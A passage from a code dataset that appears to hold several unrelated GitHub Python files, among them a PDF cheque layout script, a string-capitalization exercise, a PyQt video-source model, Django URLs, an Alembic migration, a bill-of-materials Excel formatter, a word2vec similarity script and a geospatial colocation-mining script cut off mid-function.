mm, \"$ {:,.2f}\".format(float(amount)))\r\n c.setFont('Arial', 10)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 45 * mm, \"Pay to the\")\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 50 * mm, \"order of______________________________________\")\r\n c.setFont('Arial', 12)\r\n c.drawString(LEFT_MARGIN + 20 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 50 * mm, payee_name)\r\n c.setFont('Arial', 10)\r\n c.drawString(LEFT_MARGIN, CHEQUE_HEIGHT - TOP_MARGIN - 60 * mm, \"Memo: {}\".format(memo))\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 45 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 60 * mm, \"____________________\")\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 45 * mm, CHEQUE_HEIGHT - TOP_MARGIN - 65 * mm, \"AUTHORIZED SIGNATURE\")\r\n c.setFont('Arial', 12)\r\n \r\n # add blank line for authorized signature\r\n c.drawString(CHEQUE_WIDTH - RIGHT_MARGIN - 50 * mm, BOTTOM_MARGIN + 10, \"\")\r\n \r\n # save and close PDF file\r\n c.save()\r\n \r\n # print success message\r\n print(\"Cheque created successfully! File Name: {}\".format(file_name))\r\n\r\ndef format_amount(amount):\r\n cents = int(round(amount * 100))\r\n formatted_amount = \"{:02d}\".format(cents % 100)\r\n return formatted_amount\r\n\r\n# run the program\r\ncreate_cheque()","repo_name":"whiteh4cker-tr/chequewriter","sub_path":"chequewriter.py","file_name":"chequewriter.py","file_ext":"py","file_size_in_byte":8097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"73137770689","text":"'''\n --- Directions\n Write a function that accepts a string. The function should capitalize\n the first letter of each word in the string then return the capitalized \n string \n\n --- examples\n capitalize('a short sentence') ---> 'A Short Sentence'\n capitalize('a lazy fox') ---> 'A Lazy Fox'\n capitalize('look, it is working!') ---> 'Look, It Is Working!'\n\n'''\n\n# Using the capitalize() function\ndef capitalize(text): \n return ' '.join([s.capitalize() for s in text.split()])\n\ndef capitalize_v2(text): \n words_list_cap = []\n for word in text.split(): \n words_list_cap.append(word[0].upper() + word[1:])\n \n return ' '.join(words_list_cap)\n\ndef capitalize_v3(text): \n result = text[0].upper()\n for idx in range(1, len(text)): \n if text[idx-1] == ' ': \n result += text[idx].upper()\n else: \n result += text[idx]\n\n return result\n\n\n# Testing \n\n# print(capitalize('a short sentence') )\n# print(capitalize('a lazy fox') )\n# print(capitalize('look, it is working!') )\n\n# print(capitalize_v2('a short sentence') )\n# print(capitalize_v2('a lazy fox') )\n# print(capitalize_v2('look, it is working!') )\n\nprint(capitalize_v3('a short sentence') )\nprint(capitalize_v3('a lazy fox') )\nprint(capitalize_v3('look, it is working!') )\n","repo_name":"knromaric/Algorithms-and-Data-Structure-in-python","sub_path":"capitalize/capitalize.py","file_name":"capitalize.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27524470990","text":"# Standard library imports\nimport logging\n\n# Third party imports\nfrom PyQt5.QtCore import QAbstractTableModel, Qt, QVariant, pyqtSignal\n\n# Local application imports\nfrom database import videodb\nfrom database.models import VideoSource\n\nlogger = logging.getLogger(__name__)\n\n\nclass VideoSourceQtModel(QAbstractTableModel):\n db = videodb.FacebookVideoDatabase(dbname=r'facebookvideo.db')\n\n videoSourceAddedSignal = pyqtSignal(object)\n\n def __init__(self, parent, *args):\n QAbstractTableModel.__init__(self, parent, *args)\n # 5. fetch data\n\n results = self.db.session.query(VideoSource).all()\n self.mylist = results\n\n self.header = ['id', 'url']\n\n self.videoSourceAddedSignal.connect(self.add_source)\n\n def _update_model_data(self):\n self.beginResetModel()\n results = self.db.session.query(VideoSource).all()\n\n self.mylist = results\n self.endResetModel()\n\n def rowCount(self, parent):\n return len(self.mylist)\n\n def columnCount(self, parent):\n return len(self.header)\n\n def data(self, index, role):\n # 5. populate data\n if not index.isValid():\n return None\n if (role == Qt.DisplayRole):\n return getattr(self.mylist[index.row()],self.header[index.column()])\n else:\n return QVariant()\n\n def headerData(self, col, orientation, role):\n if orientation == Qt.Horizontal and role == Qt.DisplayRole:\n return self.header[col]\n return None\n\n def get_url(self, index: int):\n if index < len(self.mylist):\n return self.mylist[index].url\n else:\n return \"\"\n\n def add_source(self, url: str):\n if not self.check_page_exists(url):\n video_source = VideoSource(url = url)\n self.db.session.add(video_source)\n self.db.session.commit()\n self._update_model_data()\n\n def check_page_exists(self, url: str):\n url_existed = self.db.session.query(VideoSource).filter(VideoSource.url == url).first() is not None\n return url_existed","repo_name":"mtl0612/SocialVideoGrab","sub_path":"src/models/VideoSourceQtModel.py","file_name":"VideoSourceQtModel.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10237159096","text":"from django.urls import path\r\nfrom .views import PostApiView, PostDetailApiView, LikeApiView, PostDeleteApiView\r\n\r\n\r\nurlpatterns = [\r\n path('posts', PostApiView.as_view(), name='post_api'),\r\n path('posts/', PostDetailApiView.as_view(), name='postdetail_api'),\r\n path('posts/:delete', PostDeleteApiView.as_view(), name='postdelete_api'),\r\n path('likes', LikeApiView.as_view(), name='likes_api')\r\n]","repo_name":"ogokdas/social-network_restful-api","sub_path":"Django_restful_API/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74055468928","text":"\"\"\"update tags\n\nRevision ID: a66bd73f59d3\nRevises: 5861dcba496d\nCreate Date: 2023-05-05 14:26:20.154977\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a66bd73f59d3'\ndown_revision = '5861dcba496d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('artickle_tag',\n sa.Column('article.id', sa.Integer(), nullable=False),\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['article.id'], ['article.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tag.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('artickle_tag')\n # ### end Alembic commands ###\n","repo_name":"GAS53/flask_dz","sub_path":"project/migrations/versions/a66bd73f59d3_update_tags.py","file_name":"a66bd73f59d3_update_tags.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27179268674","text":"# BOM formating \r\n# Original BOM 9010242321 now 123240109\r\nimport openpyxl\r\nimport re # Regular Expressions library\r\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font\r\n\r\nheaders = [\"Level\", \"Customer Part Number\", \"Qty\", \"Ref Des\", \"Item Rev\", \"Mara #\", \"Mara Description\", \"Cust MFR\", \"Cust MPN\", \"Cust Notes\", \"Higher Level\", \"Ext Qty\"]\r\n\r\n# Styling for headers\r\nfont_headers = Font(name = 'Arial', size = 10, bold = True)\r\n\r\n# Column map from CustBOM\r\ncust_bom_ref = {\"Level\": 1, \"Number\": 2, \"BOM.Qty\": 15, \"BOM.Ref\": 18, \"Rev\": 11, \"Description\": 4, \"Manufacturers.MFR Name\": 26, \"Manufacturers.MPN\": 27}\r\n\r\ndef main():\r\n\r\n filepath_old = \"a_20180412_064608761.xlsx\"\r\n filepath_new = \"a_20181029_024744353.xlsx\"\r\n\r\n wb_old = openpyxl.load_workbook(filepath_old)\r\n wb_new = openpyxl.load_workbook(filepath_new)\r\n\r\n cust_sheet = wb_old[\"Sheet0\"] # Select Sheet0 as CustBOM\r\n ws_new_sheet = wb_new[\"Sheet0\"] # Select Sheet0 of new file as CustBOM\r\n\r\n mara_format = wb_old.create_sheet(\"PFormat\") # Create new sheet called PFormat in old workbook\r\n \r\n # Print old wb sheet names\r\n print(wb_old.sheetnames)\r\n\r\n # Old sheet max rows and columns\r\n max_row = cust_sheet.max_row\r\n max_col = cust_sheet.max_column\r\n\r\n # New sheet max rows and columns\r\n max_new_row = ws_new_sheet.max_row\r\n max_new_col = ws_new_sheet.max_column\r\n\r\n # Prints stats of each file\r\n print(\"There are \" + str(max_row) + \" line items in \" + str(filepath_old))\r\n print(\"There are \" + str(max_new_row) + \" line items in \" + str(filepath_new))\r\n\r\n # Copies BOM lvl and Assy p/n to top\r\n for col in range(1,3):\r\n mara_format.cell(1, col).value = cust_sheet.cell(2, col).value\r\n \r\n # Copies Rev and Description to new format\r\n mara_format[\"E1\"] = cust_sheet[\"K2\"].value\r\n mara_format[\"G1\"] = cust_sheet[\"D2\"].value\r\n\r\n # Adding headers into new sheet\r\n col = 1\r\n for item in headers:\r\n mara_format.cell(2, col).value = item # Copies each header into each cell\r\n mara_format.cell(2, col).font = font_headers # Setting the styling of each header\r\n col += 1\r\n\r\n # Copying various customer columns (ref cust_bom_col variable at top) over to Mara new sheet\r\n m_col = 1 # Start col 1 of new sheet\r\n for cust_col in cust_bom_ref.values(): # Loop through each item in cust_bom_ref dict and use it's values\r\n m_row = 3 # Start row 3 of new sheet and reset to 3 after each column is copied \r\n for cust_row in range(3, max_row): # Loop through each row in cust sheet until end \r\n mara_format.cell(m_row, m_col).value = cust_sheet.cell(cust_row, cust_col).value # Copy cells from cust sheet cell to mara format cell\r\n m_row += 1 # Increase to new row of new sheet\r\n m_col += 1 # Increase to next col of new sheet\r\n if m_col == 6 or m_col == 11: # Skip col 6 and 11 of new sheet\r\n m_col += 1 \r\n\r\n # Adjust columns to length of cell values\r\n for col in mara_format.columns:\r\n max_length = 0\r\n column = col[0].column # Gets the Column letter/name\r\n for cell in col:\r\n try: # Avoid error on an empty cell\r\n if len(str(cell.value)) > max_length:\r\n max_length = len(cell.value)\r\n except:\r\n pass\r\n adjusted_width = (max_length + 1)\r\n mara_format.column_dimensions[column].width = adjusted_width\r\n\r\n # Insert Higher Level\r\n level_ref = {} # Dict to hold level number ref part number\r\n col = 1 # BOM level typically on column 1\r\n for row in range(2, max_row): # Loop through each row of CustBOM\r\n try: # Avoid error on an empty cell\r\n current_level = int(cust_sheet.cell(row, col).value) # Store the BOM level an int in variable current_level\r\n #if current_level == 0 or current_level == 1:\r\n level_ref[current_level] = cust_sheet.cell(row, col + 1).value # Store in dict \"current_level : part number\"\r\n except: # Just pass through if any error\r\n pass\r\n \r\n higher_lvl_col = 11 # Mara formatted sheet column \"Higher Level\"\r\n col = 1 # BOM level typically on column 1\r\n for row in range(3, max_new_row):\r\n try: \r\n bom_level = int(mara_format.cell(row, col).value)\r\n if bom_level >= 1: # If the Line item BOM level is >= 1\r\n mara_format.cell(row, higher_lvl_col).value = level_ref[bom_level - 1] # Ref level_ref dict for one BOM level higher\r\n except:\r\n pass \r\n\r\n def check_qty(qty, ref_des):\r\n '''\r\n Input: qty, ref_des (str) \\n\r\n Output: qty, num_ref_des, boolean qty == num_ref_des\r\n '''\r\n qty = int(qty)\r\n ref_des_split = ref_des.split(\",\")\r\n num_ref_des = len(ref_des_split)\r\n\r\n return (qty, num_ref_des, qty == num_ref_des)\r\n \r\n # Saves changes\r\n wb_old.save(filepath_old)\r\n\r\ndef remove_ws(phrase):\r\n '''Returns all whitespaces removed in phrase'''\r\n \r\n return phrase.replace(\" \", \"\")\r\n\r\ndef regex_ranges(string, pattern = '([A-Z]+)([0-9]+)-[A-Z]+([0-9]+)'):\r\n \"\"\"\r\n Takes in a string and regex pattern. Returns list of tuples with designators and start/end range.\r\n Default regex pattern: '([A-Z]+)([0-9]+)-[A-Z]+([0-9]+)'\r\n Return: [('R','2','5'),('CR','10','12')]\r\n \"\"\"\r\n # Default pattern: Regex formula to pull first Designator plus numerical range with \"-\"\" in the middle.\r\n return re.findall(pattern, string)\r\n\r\ndef sorted_nicely(l):\r\n \"\"\" Sorts the given iterable in the way that is expected.\r\n \r\n Required arguments:\r\n l -- The iterable to be sorted.\r\n \r\n \"\"\"\r\n convert = lambda text: int(text) if text.isdigit() else text\r\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\r\n return sorted(l, key = alphanum_key)\r\n\r\ndef unpack_des(phrase):\r\n \"\"\"\r\n Takes in \"phrase\" in str form, unpacks designators and returns it unpacked in string form.\r\n Phrase should contain a \"-\". ie. \"R20, R1-R5, R9, CR1-CR4, CR8, R10-R15, CR9-CR11, MAR3-MAR5, MAR1\"\r\n \"\"\"\r\n \r\n # Variables\r\n breakdown_phrase = [] # List to hold the phrase broken down into a list\r\n designators = '' # Variable to hold a string of unpacked and sorted designators\r\n unpacked_list = [] # Initiate variable to hold all unpacked designator char + number\r\n\r\n clean_phrase = remove_ws(phrase) # Removes all whitespace from phrase\r\n \r\n breakdown_phrase = clean_phrase.replace('-',',').split(',') # Takes phrase, replace '-' w/ ',' then split using ',' Need this for union of two lists later.\r\n \r\n extracted_tuples = regex_ranges(clean_phrase) # Uses regex pattern to pull all ranges from phrase\r\n\r\n # Loops through each set of tuples of extracted designators and ranges\r\n for range_set in extracted_tuples: \r\n # Grabs start[1] and end[2] + 1 ranges from each tuple set, concatenates designator char with number and appends to list\r\n # Unpacked_list adds to itself or else each loop iteration of a tuple set will erase the variable\r\n unpacked_list += [range_set[0] + str(des_num) for des_num in range(int(range_set[1]), int(range_set[2]) + 1)]\r\n \r\n repacked_list = list(set(unpacked_list).union(set(breakdown_phrase))) # Takes unpacked_list and combines with single designators list\r\n\r\n sorted_repacked_list = sorted_nicely(repacked_list) # Sorts list alphanumerically using \"sorted_nicely\" function\r\n\r\n for items in sorted_repacked_list: # Turns list back into a string with commas in between each designator\r\n designators += items + ','\r\n \r\n #print(designators.strip(\",\")) # Strips last \",\" at the end of string\r\n return designators.strip(\",\") # Strips last \",\" at the end of string and returns string\r\n\r\nif __name__ == '__main__':\r\n #main()\r\n\r\n new_des = unpack_des(\"R20, R1-R5, R9, CR1-CR4, CR8, R10-R15, CR9-CR11, MAR3-MAR5, MAR1\")\r\n print(new_des)","repo_name":"swiftvic/BOM_Format","sub_path":"BOM_Format.py","file_name":"BOM_Format.py","file_ext":"py","file_size_in_byte":10070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4320974930","text":"#/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# 测试完善中\r\n\r\nimport numpy\r\nimport jieba\r\njieba.set_dictionary(\"./data/jieba/dict.txt.big\")\r\njieba.load_userdict(\"./data/jieba/userdict.txt\")\r\nimport jieba.posseg\r\nimport jieba.analyse\r\nfrom gensim.models.word2vec import Word2Vec\r\nmodel = Word2Vec.load_word2vec_format(\"./data/vectors.bin\", binary=True)\r\nfrom mytools import time_me, get_current_time\r\n\r\ndef word_similarity(w1, w2):\r\n return model.similarity(w1, w2)\r\n\t\r\ndef sum_cosine(matrix, threshold):\r\n \"\"\"\r\n 1.计算语义Jaccard中分子total,即分词相似性矩阵的Cosine和\r\n 2.计算m: 两个集合中没有达到语义匹配标准(由阈值threshold控制)的总片段个数或者两者中取最大值\r\n \"\"\"\r\n total = 0\r\n count = 0\r\n row = matrix.shape[0]\r\n col = matrix.shape[1]\r\n zero_row = numpy.zeros([1,col])\r\n zero_col = numpy.zeros([row,1])\r\n max = matrix.max()\r\n while max > threshold:\r\n total += max\r\n count += 1\r\n re = numpy.where(matrix==max)\r\n i = re[0][0]\r\n j = re[1][0]\t\t\r\n matrix[i,:] = zero_row\r\n matrix[:,j] = zero_col\r\n max = matrix.max()\r\n m = (row - count) if row > col else (col - count)\r\n return dict(total=total, m=m, total_dif=max)\r\n\t\r\n@time_me()\t\r\ndef vec_jaccard(sentence1, sentence2, pattern = 'w'):\r\n \"\"\"\r\n 向量语义Jaccard, 返回向量语义相似度打分\r\n \"\"\"\r\n sv_matrix = []\r\n sv_rows = []\r\n if pattern == 'w':\r\n sv1 = list(jieba.cut(sentence1))\r\n sv2 = list(jieba.cut(sentence2))\r\n elif pattern == 't':\r\n sv1 = jieba.analyse.extract_tags(sentence1, topK=10)\r\n sv2 = jieba.analyse.extract_tags(sentence2, topK=10)\r\n print(sv1, sv2)\r\n\t# 根据训练好的vectors.bin建模来计算相似度。阈值设定为0.6,每两个词的相似度打分为[0,1]\r\n for w1 in sv1:\r\n for w2 in sv2:\r\n score = word_similarity(w1, w2)\r\n sv_rows.append(score)\r\n sv_matrix.append(sv_rows)\r\n sv_rows = []\t\r\n matrix = numpy.mat(sv_matrix)\t\r\n result = sum_cosine(matrix, 0.6)\r\n total = result[\"total\"]\r\n total_dif = result[\"total_dif\"]\r\n m = result[\"m\"]\r\n similarity = total/(total + m*(1-total_dif))\r\n\t\r\n return similarity\r\n\t\r\nif __name__ == '__main__':\r\n print(\"向量语义相似度测试......\") \r\n filename = \"log/VecSimilarity_\" + get_current_time() + \".md\"\r\n f = open(filename, \"w\")\r\n f.write(\"标签:测试文档\\n#向量语义相似度测试:\\n>Enter the VecSimilarity mode...\\n\")\r\n\r\n while True:\r\n try:\r\n sentence1 = input(\"\\nsentence1\\n>>\")\r\n sentence2 = input(\"sentence2\\n>>\")\r\n similarity = vec_jaccard(sentence1, sentence2, 'w')\r\n print(\"similarity: \" + str(similarity))\r\n similarity = vec_jaccard(sentence1, sentence2, 't')\r\n print(\"similarity: \" + str(similarity))\r\n \r\n f.write(\"`>>\" + sentence1 + \"`\\n\")\r\n f.write(\"`>>\" + sentence2 + \"`\\n\")\r\n f.write(\"`\" + \"similarity: \" + str(similarity) + \"`\\n\")\r\n except KeyboardInterrupt:\r\n f.close() ","repo_name":"timedcy/ImEverywhere","sub_path":"ImEverywhere/vec.py","file_name":"vec.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"9934100998","text":"from grn_thresholding import *\nimport numpy as np\nimport pandas as pd\nimport unittest\n\nclass soft_thresholding_tests(unittest.TestCase):\n def test_input(self):\n model = SoftThr(beta = .5)\n with self.assertRaises(ValueError):\n model(pd.DataFrame(np.random.rand(4, 3)))\n\n def test(self):\n G = np.asarray([[1, 2, 8], [4, 3, 9], [11, 30, 5]])\n G_thr = G ** .5\n model = SoftThr(beta = .5)\n assert (model(G) == G_thr).all()","repo_name":"soelmicheletti/grn-thresholding","sub_path":"tests/test_soft_thresholding.py","file_name":"test_soft_thresholding.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"18744728031","text":"#!/usr/local/bin/python3\n\n\"\"\"Script to find co-location patterns.\"\"\"\n\nimport math\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport sys\n\nfrom tabulate import tabulate\nfrom time import time\n\nmainDF = None\nfeatureMap = {}\ncandidateFeatures = []\ntableInstances = []\ntotal_num_instances = {}\ncount_tables = {}\ncolocationRules = []\ncoLocations = []\ndistThreshold = None\ncolocationMap = {}\n\ncurrLat = None\ncurrLong = None\n\ntableList = []\n\ndistancePickle = None\n\n\nclass Table(object):\n \"\"\"Datastructure to save colocation.\"\"\"\n\n def __init__(self, colocationName, record):\n \"\"\"Constructor.\"\"\"\n self.prevalence = True\n self.name = colocationName\n # self.id = Table.newId()\n self.record = record # DataFrame\n self.participation_idx = 1\n count_tables[colocationName] = len(record.index)\n\n def set_participation_idx(self, participation_idx, prevalence_threshold):\n \"\"\"Set the participation Index.\"\"\"\n self.participation_idx = participation_idx\n if participation_idx < prevalence_threshold:\n self.prevalence = False\n\n def __str__(self):\n \"\"\"Represent the object in string.\"\"\"\n return 'Name :{}, Record: {}'.format(self.name,\n tabulate(self.record,\n headers='keys',\n tablefmt='psql'))\n\n __repr__ = __str__\n\n\ndef readParams(configFile):\n \"\"\"Read commandline parameters and parse the config file.\"\"\"\n with open(configFile, 'r') as configFileHandle:\n print('Reading config file :{}'.format(configFile), end=', ')\n featuresFile = configFileHandle.read().strip()\n print('Done')\n return featuresFile\n\n\ndef mapFeatures(featuresList):\n \"\"\"Map file names to Alphabet for short dictionary keys.\"\"\"\n global featureMap\n global mainDF\n\n print('\\nFeature --> Shortname')\n for num, feature in enumerate(featuresList):\n alphabet = chr(65 + num)\n featureMap[feature] = alphabet\n cnt = len(mainDF[mainDF['feature'] == feature].index)\n print('{} --> {}: {}'.format(feature, alphabet, cnt))\n print('\\n')\n\n\ndef loadmainDF(featuresFile):\n \"\"\"Generate the features map.\"\"\"\n global mainDF\n global featureMap\n\n # Add column name\n columns = ['rowId', 'lat', 'long', 'feature']\n mainDF = pd.read_csv(featuresFile, names=columns)\n featuresList = sorted(list(set(mainDF['feature'])))\n\n # Map features\n mapFeatures(featuresList)\n\n # Map feature to Alphabet for all the records\n mainDF['feature'] = mainDF['feature'].apply(\n lambda x: featureMap[x])\n\n print('Total {} records'.format(len(mainDF.index)))\n\n\n# def haversineDistance(origin, destination):\ndef haversineDistance(destination):\n \"\"\"Calculate the Haversine distance between two geo co-ordiantes.\"\"\"\n global currLat\n global currLong\n lat1, lon1 = currLat, currLong\n lat2, lon2 = map(float, destination)\n radius = 3959 # miles\n dlat = math.radians(lat2 - lat1)\n dlon = math.radians(lon2 - lon1)\n\n a = math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1)) * \\\n math.cos(math.radians(lat2)) * math.sin(dlon / 2) * math.sin(dlon / 2)\n\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = radius * c\n\n if d < distThreshold:\n return True\n else:\n return False\n\n\ndef createColocationMap(featuresMap):\n \"\"\"Generate the distance map.\"\"\"\n global currLat\n global currLong\n global colocationMap\n\n colocationMap[2] = []\n\n features = [_ for _ in featureMap.values()]\n featureCount = len(features)\n\n for idx1 in range(featureCount):\n currFeature = features[idx1]\n\n # Current feature records\n cR = mainDF[mainDF['feature'] == currFeature]\n\n for idx2 in range(idx1 + 1, featureCount):\n # Other feature records\n otherFeature = features[idx2]\n print('Generating colocation table for {}{}'.format(currFeature,\n otherFeature))\n oR = mainDF[mainDF['feature'] == otherFeature]\n copyOR = oR\n tempRowInsts = []\n\n start = time()\n processed = 0\n recCount = len(cR.index)\n\n for _, row in cR.iterrows():\n currLat, currLong = row['lat'], row['long']\n index = row['rowId']\n\n latUp = row['lat'] + 0.00725\n latLow = row['lat'] - 0.00725\n longUp = row['long'] + 0.00725\n longLow = row['long'] - 0.00725\n\n oR = oR[(oR['lat'] < latUp)]\n oR = oR[(oR['lat'] > latLow)]\n oR = oR[(oR['long'] > longLow)]\n oR = oR[(oR['lat'] > longUp)]\n\n if len(oR.index) == 0:\n processed += 1\n if processed % 500 == 0 or processed == recCount:\n end = time() - start\n print('{} {} {}'.format(processed, end,\n recCount - processed))\n start = time()\n continue\n\n destinationCoords = oR[['lat', 'long']].values.tolist()\n results = []\n for coords in destinationCoords:\n results.append(haversineDistance(coords))\n\n for idx, res in enumerate(results):\n if res:\n tempRowInsts.append(\n [index, oR.iloc[idx]['rowId']])\n oR = copyOR\n\n processed += 1\n if processed % 500 == 0 or processed == recCount:\n end = time() - start\n print('{} {} {}'.format(processed, end,\n recCount - processed))\n start = time()\n\n colocationTable = Table(currFeature + otherFeature,\n pd.DataFrame(tempRowInsts,\n columns=[currFeature,\n otherFeature]))\n colocationMap[2].append(colocationTable)\n\n\ndef longest_common_substring(string1, string2):\n \"\"\"Find the common columns between two colocation table.\"\"\"\n m = len(string1)\n n = len(string2)\n\n L = [[0 for x in range(n+1)] for x in range(m+1)]\n\n # Following steps build L[m+1][n+1] in bottom up fashion. Note\n # that L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1]\n for i in range(m+1):\n for j in range(n+1):\n if i == 0 or j == 0:\n L[i][j] = 0\n elif string1[i-1] == string2[j-1]:\n L[i][j] = L[i-1][j-1] + 1\n else:\n L[i][j] = max(L[i-1][j], L[i][j-1])\n\n # Following code is used to print LCS\n index = L[m][n]\n\n # Create a character array to store the lcs string\n lcs = [\"\"] * (index+1)\n lcs[index] = \"\"\n\n # Start from the right-most-bottom-most corner and\n # one by one store characters in lcs[]\n i = m\n j = n\n while i > 0 and j > 0:\n\n # If current character in X[] and Y are same, then\n # current character is part of LCS\n if string1[i-1] == string2[j-1]:\n lcs[index-1] = string1[i-1]\n i -= 1\n j -= 1\n index -= 1\n\n # If not same, then find the larger of two and\n # go in the direction of larger value\n elif L[i-1][j] > L[i][j-1]:\n i -= 1\n else:\n j -= 1\n\n return \"\".join(lcs)\n\n\ndef subsequences(string, n):\n \"\"\"Compute the subsequnces.\"\"\"\n return [string[i:i+n] for i in range(len(string)-n+1)]\n\n\ndef isValidCandidate(tableA, tableB, size):\n \"\"\"Check if by merging two colocation tables we can create new.\"\"\"\n name = tableA.name + tableB.name\n coLocationName = ''.join(set(name))\n return size == len(coLocationName)\n\n\ndef joinTables(tableA, tableB):\n \"\"\"Join tables and their common records.\"\"\"\n name = tableA.name + tableB.name\n coLocationName = ''.join(sorted(set(name)))\n print('Joining {} and {} : New Colocation:{}'.format(tableA.name,\n tableB.name,\n coLocationName))\n commonFeatures = longest_common_substring(tableA.name, tableB.name)\n if len(commonFeatures) > 1:\n commonFeatures = list(commonFeatures)\n print(commonFeatures)\n records = pd.merge(tableA.record, tableB.record, how='inner',\n on=commonFeatures)\n\n table = type('Table', (object,), {})()\n found_index = -1\n if len(tableInstances[len(coLocationName)-1]) > 0:\n for i in range(len(tableInstances[len(coLocationName)-1])):\n if tableInstances[len(coLocationName)-1][i].name == coLocationName:\n found_index = i\n break\n\n print('Found Index{}'.format(found_index))\n if found_index > -1:\n table = tableInstances[len(coLocationName)-1][i]\n table.record.append(records, ignore_index=True)\n else:\n table = Table(coLocationName, records)\n\n return found_index, table\n\n\ndef createCandidates(size):\n \"\"\"Run through the pruned tables and create candidates.\"\"\"\n prunedTables = []\n for instance in tableInstances[size-1]:\n if instance.prevalence:\n prunedTables.append(instance)\n tableInstances.append([])\n for i in range(0, len(prunedTables)-1):\n for j in range(i+1, len(prunedTables)):\n if isValidCandidate(prunedTables[i], prunedTables[j], size + 1):\n found_index, joinT = joinTables(prunedTables[i],\n prunedTables[j])\n if found_index == -1:\n tableInstances[size].append(joinT)\n\n\ndef calculatePrevalence(size, prevalence_threshold):\n \"\"\"Calculate Prevalence.\"\"\"\n for i in range(0, len(tableInstances[size-1])):\n features = tableInstances[size-1][i].record.columns.values.tolist()\n number_of_instances = [len(np.unique(tableInstances[size-1][i].record[f].values)) for f in features]\n participation_ratios = [float(number_of_instances[index])/total_num_instances[f] for index, f in enumerate(features)]\n if tableInstances[size-1][i].name == 'IM':\n print(number_of_instances)\n print(total_num_instances)\n participation_idx = min(participation_ratios)\n tableInstances[size-1][i].set_participation_idx(participation_idx, prevalence_threshold)\n count_tables[tableInstances[size-1][i].name] = len(tableInstances[size-1][i].record.index)\n print('Table Name {} : Participation Index -> {}'.format(tableInstances[size-1][i].name, participation_idx))\n\n\ndef initializeColocation(prevalence_threshold):\n \"\"\"Initialize Colocation.\"\"\"\n global featureMap\n global colocationMap\n global distancePickle\n\n initial_tables_1 = []\n for feature in featureMap:\n rowIds = mainDF['rowId'][mainDF['feature'] ==\n featureMap[feature]].values\n total_num_instances[featureMap[feature]] = len(rowIds)\n records = pd.DataFrame(data=rowIds, columns=[feature])\n table = Table(featureMap[feature], records)\n initial_tables_1.append(table)\n\n tableInstances.append(initial_tables_1)\n with open(distancePickle, 'rb') as f:\n initial_tables_2 = pickle.load(f)\n\n tableInstances.append(initial_tables_2)\n calculatePrevalence(2, prevalence_threshold)\n # For colocation of size 2\n generateColocationRules(1)\n\n\ndef generateColocationRules(size):\n \"\"\"Generate the co-location rules.\"\"\"\n global colocationRules\n global coLocations\n for i in range(0, len(tableInstances[size])):\n if tableInstances[size][i].prevalence:\n substrings = []\n for j in range(len(tableInstances[size][i].name)):\n s = subsequences(tableInstances[size][i].name, j)\n substrings.append(s)\n flat_substrings_list = [item for sublist in substrings for item in sublist]\n flat_substrings_list = list(filter(None, flat_substrings_list))\n for sub_str in flat_substrings_list:\n if sub_str not in count_tables or count_tables[sub_str] == 0:\n continue\n rule_name = sub_str + '->' + tableInstances[size][i].name.replace(sub_str, \"\")\n conditional_probability = (float)(len(tableInstances[size][i].record[list(sub_str)].drop_duplicates().index)) / count_tables[sub_str]\n if conditional_probability > 1:\n continue\n rule = {}\n rule[rule_name] = round(conditional_probability, 3)\n colocationRules.append(rule)\n\n coLocations.append(tableInstances[size][i].name)\n\n\ndef colocationMinerAlgo(prevalence_threshold):\n \"\"\"Run the Colocation Miner Algorithm.\"\"\"\n initializeColocation(prevalence_threshold)\n previousColocation = True\n for k in range(3, len(featureMap)):\n if previousColocation:\n createCandidates(k-1)\n calculatePrevalence(k, prevalence_threshold)\n # print(tableInstances[k-1])\n generateColocationRules(k-1)\n else:\n break\n\n\ndef createQGISFiles():\n \"\"\"Generate Files for QGIS.\"\"\"\n for i in range(2, len(tableInstances)):\n for table in tableInstances[i]:\n rows = []\n if table.prevalence:\n features = list(table.name)\n for index, row in table.record.iterrows():\n if index % 30 != 0:\n continue\n if index > 1000:\n break\n for f in features:\n curRow = []\n curRow.append(mainDF['lat'][mainDF['rowId'] == row[f]]\n .values[0])\n curRow.append(mainDF['long'][mainDF['rowId'] == row[f]]\n .values[0])\n curRow.append(index+1)\n rows.append(curRow)\n\n df = pd.DataFrame(rows, columns=['Lat', 